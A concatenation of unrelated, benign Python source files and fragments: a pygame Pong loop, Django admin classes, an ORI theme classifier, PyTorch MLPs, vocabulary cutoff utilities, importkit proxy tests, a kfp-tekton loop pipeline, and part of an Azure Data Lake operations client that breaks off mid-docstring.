win1 = font.render('Player 1 Win!', True, (230, 255, 0))
win2 = font.render('Player 2 Win!', True, (230, 255, 0))
# Ball velocity components (pixels per frame).
speed_x=3
speed_y=3
game=True
finish=False
clock=time.Clock()
FPS=60
while game:
    # Handle window-close events.
    for e in event.get():
        if e.type == QUIT:
            game = False
    if finish != True:
        window.fill(back)
        p_l.updatel()
        p_r.updater()
        ball.rect.x += speed_x
        ball.rect.y += speed_y
        # Bounce off paddles horizontally, off top/bottom vertically.
        if sprite.collide_rect(p_l, ball) or sprite.collide_rect(p_r, ball):
            speed_x*=-1
        if ball.rect.y > win_height-50 or ball.rect.y < 0:
            speed_y *=-1
        # Ball past the left edge: player 2 wins; past the right: player 1.
        if ball.rect.x < 0:
            finish=True
            window.blit(win2, (200,200))
        if ball.rect.x > win_width:
            finish=True
            window.blit(win1, (200,200))
        p_l.reset()
        p_r.reset()
        ball.reset()
    display.update()
    clock.tick(FPS)
from django.contrib import admin
from datetime import *
from companies.models import Sector, IndustryGroup, Industry, SubIndustry
from companies.models import Company, Ownership, Director, Executive, CompanyNameChange
# ModelAdmin registrations for the industry classification hierarchy
# (Sector > IndustryGroup > Industry > SubIndustry) and for companies.
class SectorAdmin(admin.ModelAdmin):
    search_fields=["name",]
    list_display = ('name', 'symbol', 'custom')
admin.site.register(Sector, SectorAdmin)
class IndustryGroupAdmin(admin.ModelAdmin):
    search_fields=["name",]
    list_display = ('name', 'symbol', 'sector', 'custom')
admin.site.register(IndustryGroup, IndustryGroupAdmin)
class IndustryAdmin(admin.ModelAdmin):
    search_fields=["name",]
    list_display = ('name', 'symbol', 'industry_group', 'sector', 'custom')
admin.site.register(Industry, IndustryAdmin)
class SubIndustryAdmin(admin.ModelAdmin):
    search_fields=["name",]
    list_display = ('name', 'symbol', 'industry', 'custom')
admin.site.register(SubIndustry, SubIndustryAdmin)
# Name changes are searchable by both the old and the new name.
class CompanyNameChangeAdmin(admin.ModelAdmin):
    search_fields=["company__name", "name_before", "name_after"]
    list_display = ('company', 'date', 'name_before', 'name_after')
    list_filter=['date']
admin.site.register(CompanyNameChange, CompanyNameChangeAdmin)
class CompanyAdmin(admin.ModelAdmin):
    search_fields=["name",]
    # slug_name is pre-filled from name in the admin form.
    prepopulated_fields = { 'slug_name': ['name'] }
    list_filter=['country', 'is_auditor']
    list_display = ('name', 'country', 'company_type', 'sub_industry')
admin.site.register(Company, CompanyAdmin)
class OwnershipAdmin(admin.ModelAdmin):
    search_fields=["name",]
admin.site.register(Ownership, OwnershipAdmin)
# People
# Directors and executives are searched via their related company and
# person records.
class DirectorAdmin(admin.ModelAdmin):
    search_fields=["company__name", "person__first_name", "person__last_name", "person__other_names"]
admin.site.register(Director, DirectorAdmin)
class ExecutiveAdmin(admin.ModelAdmin):
    search_fields=["company__name", "person__first_name", "person__last_name", "person__other_names"]
admin.site.register(Executive, ExecutiveAdmin)
# Inline classes, defined but not attached to any ModelAdmin in this file.
class DirectorInline(admin.TabularInline):
    model = Director
class ExecutivesInline(admin.TabularInline):
    model = Executive
| 2,121 | 660 |
import operator
import requests
from ocd_backend.enrichers.text_enricher.tasks import BaseEnrichmentTask
from ocd_backend.models.definitions import Meeting as MeetingNS, Rdf
from ocd_backend.models.misc import Uri
from ocd_backend.settings import ORI_CLASSIFIER_HOST, ORI_CLASSIFIER_PORT
from ocd_backend.utils.http import HttpRequestMixin
from ocd_backend.log import get_source_logger
log = get_source_logger('theme_classifier')
class ThemeClassifier(BaseEnrichmentTask, HttpRequestMixin):
    """Enrichment task that tags an item with themes from the ORI classifier."""

    def enrich_item(self, item):
        """POST the item's text to the classifier and attach scored tags.

        Returns silently when the classifier is not configured, the item
        has no (long enough) text, or the service is unreachable.
        """
        if not ORI_CLASSIFIER_HOST or not ORI_CLASSIFIER_PORT:
            # Skip classifier if no host is specified
            return
        ori_classifier_url = 'http://{}:{}/classificeer'.format(ORI_CLASSIFIER_HOST, ORI_CLASSIFIER_PORT)

        if not hasattr(item, 'text'):
            return

        text = item.text
        # isinstance() instead of type() == list: also accepts subclasses.
        if isinstance(item.text, list):
            text = ' '.join(text)

        # Texts shorter than 76 characters are not classified.
        if not text or len(text) < 76:
            return

        identifier_key = 'result'
        request_json = {
            'ori_identifier': identifier_key,  # not being used
            'name': text
        }

        try:
            response = self.http_session.post(ori_classifier_url, json=request_json)
            response.raise_for_status()
        except requests.ConnectionError:
            # Return if no connection can be made
            log.warning('No connection to theme classifier')
            return

        response_json = response.json()
        # Default to {} (not []): .items() is called on the result below.
        theme_classifications = response_json.get(identifier_key, {})

        # Build an rdf:Seq of TagHit nodes ordered by descending score.
        tags = {
            '@id': '%s#tags' % item.get_ori_identifier(),
            '@type': str(Uri(Rdf, 'Seq'))
        }
        ranked = sorted(theme_classifications.items(),
                        key=operator.itemgetter(1), reverse=True)
        for i, (name, value) in enumerate(ranked):
            tags[str(Uri(Rdf, '_%s' % i))] = {
                '@id': '%s#tags_%s' % (item.get_ori_identifier(), i),
                '@type': str(Uri(MeetingNS, 'TagHit')),
                str(Uri(MeetingNS, 'tag')): name,
                str(Uri(MeetingNS, 'score')): value,
            }

        item.tags = tags
| 2,234 | 690 |
"""
YOU ONLY TRAIN ONCE: LOSS-CONDITIONAL TRAINING OF DEEP NETWORKS
# https://openreview.net/pdf?id=HyxY6JHKwr
For YOTO models, we condition the last layer of each convolutional block.
The conditioning MLP has one hidden layer with 256 units on Shapes3D and 512 units on CIFAR-10.
At training time we sample the β parameter from log-normal distribution on the interval [0.125, 1024.]
for Shapes3D and on the interval [0.125, 512.] for CIFAR-10.
FiLM: Visual Reasoning with a General Conditioning Layer
# https://arxiv.org/pdf/1709.07871.pdf
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
class MLP(nn.Module):
    """Fully connected network: Linear -> ReLU -> Dropout per hidden layer,
    with a plain Linear output layer."""

    def __init__(self, n_input, n_output, hidden_neurons=(512,), dropout_rate=0.1):
        super(MLP, self).__init__()
        widths = (n_input,) + hidden_neurons + (n_output,)
        self.layers = nn.ModuleList(
            nn.Linear(w_in, w_out) for w_in, w_out in zip(widths[:-1], widths[1:])
        )
        self.act = nn.ReLU(inplace=True)
        self.dropout = nn.Dropout(dropout_rate)

    def forward(self, x):
        out = x
        for layer in self.layers[:-1]:
            out = self.dropout(self.act(layer(out)))
        return self.layers[-1](out)
class MultiheadMLP(nn.Module):
    """MLP with an optional shared trunk followed by independent output heads."""

    def __init__(self, n_input, n_outputs=(16, 32),
                 common_hidden_neurons=(64,),
                 multi_head_hidden_neurons=((128, 16), (128, 32)),
                 dropout_rate=0.1):
        super(MultiheadMLP, self).__init__()

        # Shared trunk: Linear -> ReLU -> Dropout per hidden width.
        if common_hidden_neurons is not None:
            trunk_widths = (n_input,) + common_hidden_neurons
            trunk = []
            for w_in, w_out in zip(trunk_widths[:-1], trunk_widths[1:]):
                trunk.extend([
                    nn.Linear(w_in, w_out),
                    nn.ReLU(inplace=True),
                    nn.Dropout(dropout_rate),
                ])
            self.com_layers = nn.Sequential(*trunk)
        else:
            trunk_widths = (n_input,)
            self.com_layers = None

        # One head per requested output size; hidden head layers are optional.
        self.head_layers = nn.ModuleList()
        for head_idx, n_out in enumerate(n_outputs):
            if multi_head_hidden_neurons is not None and multi_head_hidden_neurons[head_idx] is not None:
                head_widths = (trunk_widths[-1],) + multi_head_hidden_neurons[head_idx] + (n_out,)
            else:
                head_widths = (trunk_widths[-1],) + (n_out,)
            head = []
            for j, (w_in, w_out) in enumerate(zip(head_widths[:-1], head_widths[1:])):
                head.append(nn.Linear(w_in, w_out))
                if j < len(head_widths) - 2:
                    # Activation/dropout everywhere except the output layer.
                    head.append(nn.ReLU(inplace=True))
                    head.append(nn.Dropout(dropout_rate))
            self.head_layers.append(nn.Sequential(*head))

    def forward(self, x):
        shared = self.com_layers(x) if self.com_layers is not None else x
        return [head(shared) for head in self.head_layers]
| 3,465 | 1,304 |
XSym
0078
350008fd8e0cf4fdaa063759c1fd071b
/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/_weakrefset.py
| 1,067 | 129 |
import collections
import pandas as pd
import numpy as np
import re
import os
def count(fl, target='input_context', checks='input_keyword', vocab_size=10000):
    """Build a cumulative frequency distribution and an old->new id mapping.

    Reads pickled DataFrames, counts token ids in the *target* column
    (all but the first token of each row; the first token is only
    recorded as seen), then guarantees every id seen in the *checks*
    columns and every id below *vocab_size* has at least count 1.

    Args:
        fl: Iterable of pickle file paths containing DataFrames.
        target: Column whose token lists are counted.
        checks: Column name or list of column names whose tokens must be
            present in the vocabulary.  (The original iterated a bare
            string character by character, producing per-character
            column lookups.)
        vocab_size: Every id in ``range(vocab_size)`` gets count >= 1.

    Returns:
        (cum_prob, new_dict): cumulative probabilities ordered by
        decreasing frequency, and a dict mapping old id -> rank.
    """
    # Accept a single column name as well as a list of names.
    if isinstance(checks, str):
        checks = [checks]

    cnter = collections.Counter()
    s = set()
    for filename in fl:
        cur_df = pd.read_pickle(filename)
        texts = cur_df[target].tolist()
        for i in texts:
            cnter.update(i[1:])
            s.add(i[0])

    # Make sure every id referenced by the check columns is known.
    for filename in fl:
        cur_df = pd.read_pickle(filename)
        for check in checks:
            texts = cur_df[check].tolist()
            for i in texts:
                s.update(i)

    for i in s:
        if i not in cnter:
            cnter[i] = 1
    for i in range(vocab_size):
        if i not in cnter:
            cnter[i] = 1

    tot = sum(c for _, c in cnter.most_common())
    cum_prob = []
    running = 0.0
    for _, c in cnter.most_common():
        running += c / tot
        cum_prob.append(running)

    new_dict = {int(old_id): new_id
                for new_id, (old_id, _) in enumerate(cnter.most_common())}
    return cum_prob, new_dict
def convert_and_save(fl, dic, targets: list):
    """Re-index the target columns of each file and save under indexed_new/."""
    for filename in fl:
        converted_df = convert_idx(filename, dic, targets)
        out_path = re.sub(r'indexed/', 'indexed_new/', filename)
        out_dir = os.path.dirname(out_path)
        if not os.path.exists(out_dir):
            os.makedirs(out_dir)
        converted_df.to_pickle(out_path)
def convert_idx(filename, dic, targets: list):
    """Return the DataFrame from *filename* with target columns mapped via *dic*.

    Tokens are coerced to the type of dic's keys before lookup, so e.g.
    string tokens still hit integer keys.
    """
    key_type = type(list(dic)[0])
    frame = pd.read_pickle(filename)
    for target in targets:
        frame[target] = [
            [dic[key_type(token)] for token in row]
            for row in frame[target].tolist()
        ]
    return frame
def old_compute_cutoffs(probs, n_cutoffs):
    """Cut a cumulative distribution into n_cutoffs roughly equal-mass parts.

    Each time the cumulative probability crosses the next multiple of
    1/n_cutoffs, the index after the crossing element becomes a cutoff.
    """
    step = 1 / n_cutoffs
    threshold = step
    cutoffs = []
    for idx, prob in enumerate(probs):
        if prob > threshold:
            cutoffs.append(idx + 1)
            threshold += step
            if len(cutoffs) >= n_cutoffs - 1:
                break
    return cutoffs
def uniform_cutoffs(probs, n_cutoffs):
    """Cutoffs that split the vocabulary into equally sized clusters."""
    cluster_size = len(probs) // n_cutoffs
    return [cluster_size * k for k in range(1, n_cutoffs)]
def compute_cutoffs(probs,n_cutoffs):
    """Split a cumulative distribution into n_cutoffs clusters of roughly
    equal mass, rebalancing the per-cluster target after each cut so the
    remaining mass is spread evenly over the remaining clusters.

    Args:
        probs: Cumulative probabilities in ascending order.
        n_cutoffs: Desired number of clusters.

    Returns:
        Up to n_cutoffs - 1 index boundaries into probs.
    """
    def rebalance_cutprob():
        # Spread the not-yet-assigned mass evenly over remaining clusters.
        remaining_prob = 1 - prior_cluster_prob
        n = n_cutoffs - cnt
        return remaining_prob / n
    cutoffs = []
    probs = probs
    cut_prob = 1/n_cutoffs
    cnt = 0
    prior_cluster_prob = 0.0
    prior_idx = 0
    for idx, prob in enumerate(probs):
        # Mass accumulated in the currently open cluster.
        cluster_cumprob = prob - prior_cluster_prob
        if cluster_cumprob > cut_prob:
            if idx != prior_idx:
                # Close the cluster *before* this element.
                cutoffs.append(idx)
                prior_cluster_prob = probs[idx-1]
                prior_idx = idx
            else:
                # A single element already exceeds the target: give it a
                # cluster of its own, ending *after* this element.
                cutoffs.append(idx+1)
                prior_cluster_prob = probs[idx]
                prior_idx = idx + 1
            cnt += 1
            cut_prob = rebalance_cutprob()
            if cnt >= n_cutoffs -1:
                break
    return cutoffs
def cumulative_to_indivisual(cum_prob):
    """Convert a cumulative distribution to individual probabilities.

    The input list is left unmodified (the original temporarily inserted
    a leading 0 and popped it again afterwards).
    """
    return [cur - prev for prev, cur in zip([0] + cum_prob[:-1], cum_prob)]
def normalized_entropy(x):
    """Shannon entropy of *x* (normalized to a distribution), divided by
    the maximum possible entropy log2(len(x)); singletons score 1.0."""
    if len(x) == 1:
        return 1.0
    p = np.asarray(x, dtype=float)
    p = p / p.sum()
    entropy = -(p * np.log2(p)).sum()
    return entropy / np.log2(len(p))
def cluster_probs(probs, cutoffs):
    """Total probability mass of each cluster defined by *cutoffs*.

    *probs* is cumulative; the result has len(cutoffs) + 1 entries: the
    first cluster, the interior clusters, and the remaining tail mass.
    """
    masses = [probs[cutoffs[0] - 1]]
    masses.extend(probs[right - 1] - probs[left - 1]
                  for left, right in zip(cutoffs[:-1], cutoffs[1:]))
    masses.append(1.0 - probs[cutoffs[-1]])
    return masses
def ideal_cutoffs(probs,lower=2,upper=None):
    """Search cluster counts in [lower, upper] and return the cutoffs of
    the best-scoring one.

    The score is the normalized entropy of the cluster-mass distribution
    ("head") times the mean normalized entropy over the non-degenerate
    clusters ("tail").

    Args:
        probs: Cumulative probability list (ascending).
        lower: Smallest cluster count to try.
        upper: Largest cluster count; defaults to int(1 / probs[0]).

    Returns:
        The cutoff list of the best-scoring cluster count (None if no
        count beats a zero score).
    """
    ind_probs = cumulative_to_indivisual(probs)
    ideal = None
    max_mean = 0
    if not upper:
        # NOTE(review): default bound presumably keeps clusters no
        # smaller than the most frequent item's mass — verify intent.
        upper = int(1 / probs[0])
    for target in range(lower,upper+1):
        mean = []
        cutoffs = compute_cutoffs(probs,target)
        added_cutoffs = [0] + cutoffs + [len(probs)]
        for i in range(target):
            cluster = ind_probs[added_cutoffs[i]:added_cutoffs[i + 1]]
            mean.append(normalized_entropy(cluster))
        cluster_prob = cluster_probs(probs,cutoffs)
        head = normalized_entropy(cluster_prob)
        # Average only over clusters with non-zero entropy.
        tail = np.sum(np.array(mean)) / np.array(mean).nonzero()[0].size
        mean = head * tail
        # print(head, tail, mean)
        if mean > max_mean:
            max_mean = mean
            ideal = cutoffs
    return ideal
| 4,616 | 1,637 |
# Lesson 06-A
# Primitive types and data output
# The \033[...m sequences are ANSI color codes: black-on-white for the
# prompts, underlined cyan-on-black for the result line.
n1 = int(input('\033[0;30;47mDigite um número:\033[m'))
n2 = int(input('\033[0;30;47mDigite outro número:\033[m'))
s = n1 + n2
print('\033[4;36;40mA soma entre {} e {} vale {}\033[m'.format(n1, n2, s))
##
# Copyright (c) 2012 Sprymix Inc.
# All rights reserved.
#
# See LICENSE for details.
##
import importlib
import pickle
import sys
import types
import unittest
from importkit.import_ import module as module_utils
from importkit.import_ import utils as import_utils
class TestLangImportModuleProxy(unittest.TestCase):
    """Behavioral tests for the module proxy classes in
    importkit.import_.module."""

    def test_lang_import_module_light_proxy(self):
        """LightProxyModule forwards attribute get/set/delete to the
        wrapped module; attribute references do not survive a reload."""
        mod = importlib.import_module(__package__ + '.testdata.proxiedmod')
        proxiedmod = module_utils.LightProxyModule(mod.__name__, mod)
        assert hasattr(proxiedmod, 'sys')
        assert isinstance(proxiedmod.sys, types.ModuleType)
        assert hasattr(proxiedmod, 'a')
        assert proxiedmod.a == 10
        assert hasattr(proxiedmod, 'Klass')
        assert isinstance(proxiedmod.Klass, type)
        assert issubclass(proxiedmod.Klass, mod.Klass)
        # Attribute writes and deletes pass through to the real module.
        proxiedmod.a = 20
        assert proxiedmod.a == 20
        assert mod.a == 20
        del proxiedmod.a
        assert not hasattr(proxiedmod, 'a')
        assert not hasattr(mod, 'a')
        assert proxiedmod.func(10) == 10
        KlassRef = proxiedmod.Klass
        proxiedmod = import_utils.reload(proxiedmod)
        # Light proxy does not handle attribute references, only module ref is preserved
        assert KlassRef is not proxiedmod.Klass
        del sys.modules[mod.__name__]

    def test_lang_import_module_proxy(self):
        """ProxyModule additionally proxies comparisons/arithmetic on
        attributes and keeps attribute references valid across reload."""
        mod = importlib.import_module(__package__ + '.testdata.proxiedmod')
        proxiedmod = module_utils.ProxyModule(mod.__name__, mod)
        assert hasattr(proxiedmod, 'sys')
        assert isinstance(proxiedmod.sys, types.ModuleType)
        assert hasattr(proxiedmod, 'a')
        assert proxiedmod.a == 10
        # Proxied attributes participate in comparisons and arithmetic.
        assert proxiedmod.a > 1
        assert proxiedmod.a < 100
        assert proxiedmod.a + 1 == 11
        assert isinstance(proxiedmod.a, int)
        assert hasattr(proxiedmod, 'Klass')
        assert isinstance(proxiedmod.Klass, type)
        assert issubclass(proxiedmod.Klass, mod.Klass)
        proxiedmod.a = 20
        assert proxiedmod.a == 20
        assert mod.a == 20
        # Direct __dict__ writes are visible through the proxy as well.
        proxiedmod.__dict__['a'] = 30
        assert proxiedmod.a == 30
        assert mod.a == 30
        del proxiedmod.a
        assert not hasattr(proxiedmod, 'a')
        assert not hasattr(mod, 'a')
        assert proxiedmod.func(10) == 10
        KlassRef = proxiedmod.Klass
        proxiedmod = import_utils.reload(proxiedmod)
        # Refs are kept after reload
        assert KlassRef is proxiedmod.Klass
        del sys.modules[mod.__name__]

    def test_lang_import_module_autoloading_light_proxy(self):
        """AutoloadingLightProxyModule survives pickling: unpickling
        reuses the already-imported module, while a fresh proxy created
        after the module is dropped from sys.modules re-imports it."""
        mod = importlib.import_module(__package__ + '.testdata.proxiedmod')
        proxiedmod = module_utils.AutoloadingLightProxyModule(mod.__name__, mod)
        assert hasattr(proxiedmod, 'Klass')
        K_1 = proxiedmod.Klass
        dumped = pickle.dumps(proxiedmod)
        loaded = pickle.loads(dumped)
        assert hasattr(loaded, 'Klass')
        assert loaded.Klass is K_1
        del loaded
        del proxiedmod
        del sys.modules[mod.__name__]
        del mod
        # Module gone from sys.modules: the proxy re-imports it, so the
        # class object is a new one.
        proxiedmod = module_utils.AutoloadingLightProxyModule(__package__ + '.testdata.proxiedmod')
        assert hasattr(proxiedmod, 'Klass')
        assert proxiedmod.Klass is not K_1
| 3,304 | 1,118 |
# Copyright 2021 kubeflow.org
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import kfp.dsl as dsl
from kfp import components
from kfp_tekton import tekton
op1_yaml = '''\
name: 'my-in-coop1'
inputs:
- {name: item, type: Integer}
- {name: my_pipe_param, type: Integer}
implementation:
container:
image: library/bash:4.4.23
command: ['sh', '-c']
args:
- |
set -e
echo op1 "$0" "$1"
- {inputValue: item}
- {inputValue: my_pipe_param}
'''
@dsl.pipeline(name='my-pipeline')
def pipeline(my_pipe_param: int = 10):
    """Sequential Tekton loop over ``loop_args`` with an early break.

    Each iteration runs the ``my-in-coop1`` component; a CEL condition
    checks the current item and issues ``tekton.Break()`` when it matches.
    """
    loop_args = [1, 2]
    # The commented-out ParallelFor DSL below is expected to produce the same
    # result as the tekton.Loop.sequential version that follows.
    # NOTE(review): the commented variant breaks on item == 0 while the active
    # code breaks on item == 1 — confirm which constant is intended.
    # with dsl.ParallelFor(loop_args, parallelism=1) as item:
    #     op1_template = components.load_component_from_text(op1_yaml)
    #     op1 = op1_template(item, my_pipe_param)
    #     condi_1 = tekton.CEL_ConditionOp(f"{item} == 0").output
    #     with dsl.Condition(condi_1 == 'true'):
    #         tekton.Break()
    with tekton.Loop.sequential(loop_args) as item:
        op1_template = components.load_component_from_text(op1_yaml)
        op1 = op1_template(item, my_pipe_param)
        # Evaluate the CEL expression against the current item; break out of
        # the loop once it is 'true'.
        condi_1 = tekton.CEL_ConditionOp(f"{item} == 1").output
        with dsl.Condition(condi_1 == 'true'):
            tekton.Break()
if __name__ == '__main__':
    # Compile the pipeline into a Tekton YAML manifest next to this script.
    from kfp_tekton.compiler import TektonCompiler
    TektonCompiler().compile(pipeline, __file__.replace('.py', '.yaml'))
| 1,972 | 673 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from .. import models
# NOTE(review): AutoRest-generated operations class — prefer regenerating over
# hand-editing when the service contract changes.
class DataLakeStoreAccountsOperations(object):
    """DataLakeStoreAccountsOperations operations.
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    :ivar api_version: Client Api Version. Constant value: "2016-11-01".
    """
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        # Pinned by the 2016-11-01 service contract.
        self.api_version = "2016-11-01"
        self.config = config
    def add(
            self, resource_group_name, account_name, data_lake_store_account_name, suffix=None, custom_headers=None, raw=False, **operation_config):
        """Updates the specified Data Lake Analytics account to include the
        additional Data Lake Store account.
        :param resource_group_name: The name of the Azure resource group that
         contains the Data Lake Analytics account.
        :type resource_group_name: str
        :param account_name: The name of the Data Lake Analytics account to
         which to add the Data Lake Store account.
        :type account_name: str
        :param data_lake_store_account_name: The name of the Data Lake Store
         account to add.
        :type data_lake_store_account_name: str
        :param suffix: the optional suffix for the Data Lake Store account.
        :type suffix: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: None or
         :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
         raw=true
        :rtype: None or
         :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # A request body is only sent when a suffix was supplied.
        parameters = None
        if suffix is not None:
            parameters = models.AddDataLakeStoreParameters(suffix=suffix)
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeAnalytics/accounts/{accountName}/DataLakeStoreAccounts/{dataLakeStoreAccountName}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'accountName': self._serialize.url("account_name", account_name, 'str'),
            'dataLakeStoreAccountName': self._serialize.url("data_lake_store_account_name", data_lake_store_account_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct body
        if parameters is not None:
            body_content = self._serialize.body(parameters, 'AddDataLakeStoreParameters')
        else:
            body_content = None
        # Construct and send request
        request = self._client.put(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, **operation_config)
        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def delete(
            self, resource_group_name, account_name, data_lake_store_account_name, custom_headers=None, raw=False, **operation_config):
        """Updates the Data Lake Analytics account specified to remove the
        specified Data Lake Store account.
        :param resource_group_name: The name of the Azure resource group that
         contains the Data Lake Analytics account.
        :type resource_group_name: str
        :param account_name: The name of the Data Lake Analytics account from
         which to remove the Data Lake Store account.
        :type account_name: str
        :param data_lake_store_account_name: The name of the Data Lake Store
         account to remove
        :type data_lake_store_account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: None or
         :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
         raw=true
        :rtype: None or
         :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeAnalytics/accounts/{accountName}/DataLakeStoreAccounts/{dataLakeStoreAccountName}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'accountName': self._serialize.url("account_name", account_name, 'str'),
            'dataLakeStoreAccountName': self._serialize.url("data_lake_store_account_name", data_lake_store_account_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.delete(url, query_parameters)
        response = self._client.send(request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def get(
            self, resource_group_name, account_name, data_lake_store_account_name, custom_headers=None, raw=False, **operation_config):
        """Gets the specified Data Lake Store account details in the specified
        Data Lake Analytics account.
        :param resource_group_name: The name of the Azure resource group that
         contains the Data Lake Analytics account.
        :type resource_group_name: str
        :param account_name: The name of the Data Lake Analytics account from
         which to retrieve the Data Lake Store account details.
        :type account_name: str
        :param data_lake_store_account_name: The name of the Data Lake Store
         account to retrieve
        :type data_lake_store_account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: :class:`DataLakeStoreAccountInfo
         <azure.mgmt.datalake.analytics.account.models.DataLakeStoreAccountInfo>`
         or :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
         raw=true
        :rtype: :class:`DataLakeStoreAccountInfo
         <azure.mgmt.datalake.analytics.account.models.DataLakeStoreAccountInfo>`
         or :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeAnalytics/accounts/{accountName}/DataLakeStoreAccounts/{dataLakeStoreAccountName}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'accountName': self._serialize.url("account_name", account_name, 'str'),
            'dataLakeStoreAccountName': self._serialize.url("data_lake_store_account_name", data_lake_store_account_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('DataLakeStoreAccountInfo', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    def list_by_account(
            self, resource_group_name, account_name, filter=None, top=None, skip=None, select=None, orderby=None, count=None, custom_headers=None, raw=False, **operation_config):
        """Gets the first page of Data Lake Store accounts linked to the specified
        Data Lake Analytics account. The response includes a link to the next
        page, if any.
        :param resource_group_name: The name of the Azure resource group that
         contains the Data Lake Analytics account.
        :type resource_group_name: str
        :param account_name: The name of the Data Lake Analytics account for
         which to list Data Lake Store accounts.
        :type account_name: str
        :param filter: OData filter. Optional.
        :type filter: str
        :param top: The number of items to return. Optional.
        :type top: int
        :param skip: The number of items to skip over before returning
         elements. Optional.
        :type skip: int
        :param select: OData Select statement. Limits the properties on each
         entry to just those requested, e.g.
         Categories?$select=CategoryName,Description. Optional.
        :type select: str
        :param orderby: OrderBy clause. One or more comma-separated
         expressions with an optional "asc" (the default) or "desc" depending
         on the order you'd like the values sorted, e.g.
         Categories?$orderby=CategoryName desc. Optional.
        :type orderby: str
        :param count: The Boolean value of true or false to request a count of
